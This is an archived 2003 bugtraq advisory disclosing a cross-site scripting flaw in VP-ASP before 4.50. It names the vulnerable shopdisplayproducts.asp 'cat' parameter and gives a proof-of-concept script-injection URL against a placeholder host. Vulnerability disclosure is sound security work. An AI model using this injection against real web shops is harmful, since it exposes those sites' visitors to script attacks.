[32709] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Cross Site Scripting in VP-ASP

daemon@ATHENA.MIT.EDU (Xnuxer Research Laboratory)
Fri Dec 5 14:39:18 2003

Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
Date: Fri, 5 Dec 2003 04:19:28 -0800 (PST)
From: Xnuxer Research Laboratory <xnuxer@linux.net>
To: bugtraq@securityfocus.com
Reply-To: xnuxer@linux.net
Message-Id: <20031205121928.135FC7276@sitemail.everyone.net>

   Advisory Name: Cross Site Scripting in VP-ASP
    Release Date: December 05st, 2003
     Application: VP-ASP
Version Affected: < 4.50
        Platform: ASP
        Severity: Low
        Discover: Xnuxer Research Lab. (xnuxer@linux.net, xnuxer@yahoo.com)
      Vendor URL: http://www.vp-asp.com
       Reference: http://infosekuriti.com

Proof Of Concept:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code]

Exploit Example:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>



_____________________________________________________________
Linux.Net -->Open Source to everyone
Powered by Linare Corporation
http://www.linare.com/


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[32709] in bugtraq

Cross Site Scripting in VP-ASP

daemon@ATHENA.MIT.EDU (Xnuxer Research Laboratory)Fri Dec 5 14:39:18 2003

daemon@ATHENA.MIT.EDU (Xnuxer Research Laboratory)
Fri Dec 5 14:39:18 2003